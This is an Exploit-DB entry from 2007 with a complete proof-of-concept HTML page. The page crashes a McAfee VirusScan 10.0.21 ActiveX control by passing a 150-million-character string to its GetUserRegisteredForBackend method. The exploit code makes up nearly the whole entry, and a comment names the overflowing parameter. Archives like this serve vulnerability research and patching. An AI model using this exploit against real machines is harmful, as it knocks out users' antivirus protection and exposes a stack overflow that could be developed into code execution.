McAfee VirusScan 10.0.21 - ActiveX control Stack Overflow PoC

2007-05-09T00:00:00
ID EDB-ID:3890
Type exploitdb
Reporter callAX
Modified 2007-05-09T00:00:00

Description

McAfee VirusScan 10.0.21 ActiveX control Stack Overflow PoC. Dos exploit for windows platform

                                        
                                            <html>

<head><title> Proof of Concept -> Mc Afee Viruscan Stack Overflow v10.0.21</title>

</head>

<h4>Proof of Concept -> Mc Afee Viruscan Stack Overflow v10.0.21

http://download.mcafee.com/fr/ author -> callAX

mail -> callax@shellcode.com.ar

Url -> http://www.shellcode.com.ar / http://www.securenetworks.ch</h3>

 

<object classid='clsid:9BE8D7B2-329C-442A-A4AC-ABA9D7572602' id='Crash' ></object>

<input type="button" value="CrAsh-m3 No \/\/" language="VBScript" OnClick="CrAsHm3()">

 

<script language="VBScript">

sub CrAsHm3()

 Arg0 = String(150000000,"S")

 Arg1 = String(3000, "x")

 Crash.GetUserRegisteredForBackend Arg0, Arg1

End Sub

 

</script>

</html>

<!--
Bad method -> GetUserRegisteredForBackend

Function GetUserRegisteredForBackend (

            ByVal bstrBackend  As String , <-- Bad Buffer

            ByRef pvarAccountId  As Variant

)
-->

# milw0rm.com [2007-05-09]